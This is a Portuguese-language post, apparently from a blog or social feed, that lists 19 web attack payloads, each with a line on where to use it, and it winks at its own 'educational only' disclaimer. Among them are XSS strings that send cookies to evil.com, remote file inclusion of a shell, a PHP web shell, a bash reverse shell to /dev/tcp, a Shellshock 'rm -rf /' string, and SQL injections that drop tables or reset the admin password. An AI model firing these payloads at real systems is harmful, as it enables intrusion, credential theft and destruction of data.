vamos nos aprofundar em 19 exemplos diferentes de carga útil de exploração da Web e seus respectivos casos de uso. Esses exemplos são apenas para fins educacionais (piscadela). Feliz hacking! ?️♀️?
Não vou esconder este conteúdo, pois o aprendizado deve ser gratuito.
[Carga útil 1]
'"><img src='x'onerror='alert(1)'>
Carga útil de Cross-Site Scripting (XSS). Testa o software do servidor que não limpa a entrada do usuário. Use em endpoints que aceitam e exibem conteúdo gerado pelo usuário.
[Carga útil 2]
'%20or%20'1'='1
Carga útil de SQL Injection. Testa sites que executam software de servidor como MySQL, MSSQL, Oracle, etc. Pontos de extremidade de destino que interagem com um banco de dados.
[Carga útil 3]
../../../etc/passwd
Carga útil do Path Traversal. Usado contra software de servidor que falha ao limpar caminhos de arquivo. Os endpoints de destino geralmente interagem com o sistema de arquivos.
[Carga útil 4]
<details open="" ontoggle="javascript:alert(1)">
Carga útil de ataque XSS baseada em DOM. Testa pontos de extremidade que inserem entrada fornecida pelo usuário no Modelo de objeto de documento sem sanitização adequada.
[Carga útil 5]
() { :; }; /bin/bash -c 'rm -rf /'
Carga útil do ataque Shellshock (Bashdoor). Os servidores que executam scripts CGI que invocam o Bash são normalmente vulneráveis. Endpoints de destino invocando uma versão Bash vulnerável.
[Carga útil 6]
http://evil.com/shell.php
Carga útil de inclusão remota de arquivo (RFI). Testa o software PHP com allow_url_fopen ou allow_url_include ativado. Os endpoints de destino normalmente incluem um arquivo ou script de outra origem.
[Carga útil 7]
<script>window.location='http://evil.com/steal.php?cookie='+document.cookie</script>
A carga útil XSS tenta roubar cookies. Testa o software do servidor que não limpa a entrada do usuário e não usa cookies somente HTTP.
[Carga útil 8]
sleep(20)
Carga útil de SQL Injection baseada em tempo. Testa servidores que executam bancos de dados SQL onde o SQLi tradicional baseado em erro não é possível. Endpoints de destino que interagem com um banco de dados.
[Carga útil 9]
foo%00
Carga útil de injeção de byte nulo. Testa servidores PHP e ASP mais antigos que truncam a entrada em caracteres de byte nulo.
[Carga útil 10]
'; DROP TABLE users; --
Carga útil de SQL Injection "Bobby Tables". Testa o software do servidor que usa um banco de dados SQL e não limpa a entrada.
[Carga útil 11]
<iframe src="http://evil.com/xss.html">
Outro vetor de ataque XSS. Pode ser usado para testar qualquer software de servidor que não limpe adequadamente a entrada do usuário para elementos iframe.
[Carga útil 12]
<script>new Image().src="http://evil.com/steal.php?"+document.cookie;</script>
Essa carga XSS rouba cookies enviando-os para um site externo por meio de uma solicitação de imagem. Testa o software do servidor que não limpa adequadamente a entrada do usuário e não usa cookies somente HTTP.
[Carga útil 13]
<?php echo shell_exec($_GET['cmd']); ?>
Carga útil de injeção de comando. Útil para testar endpoints que executam comandos do sistema com base na entrada do usuário.
[Carga útil 14]
/test.php?file=ftp://user:pass@evil.com/shell.php
Esta carga útil tenta um ataque de wrapper de FTP. Ele testa o software de servidor PHP configurado para permitir wrappers de URL em funções de arquivo.
[Carga útil 15]
php://filter/convert.base64-encode/resource=index.php
Essa carga útil usa um filtro PHP para ataques de inclusão de arquivo local (LFI) e inclusão de arquivo remoto (RFI). Testa o software de servidor PHP configurado para permitir wrappers de URL.
[Carga útil 16]
'; exec '/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Esta carga é para injeção de comando. Testa o software de servidor que executa comandos de shell com base na entrada do usuário.
[Carga útil 17]
1; UPDATE users SET password = md5('new_password') WHERE name = 'admin';
Essa carga útil de injeção SQL tenta modificar dados em um banco de dados. Testa o software do servidor que não limpa adequadamente a entrada do usuário em consultas SQL.
[Carga útil 18]
<script src="http://evil.com/xss.js"></script>
Esta carga XSS tenta carregar um script malicioso de uma fonte externa. Testa o software do servidor que não limpa adequadamente a entrada do usuário para elementos de script.
[Carga útil 19]
"><marquee><h1>XSS</h1></marquee>
Outra carga XSS, esta usando o elemento HTML letreiro para confirmação visual da exploração. Testa o software do servidor que não limpa adequadamente a entrada do usuário.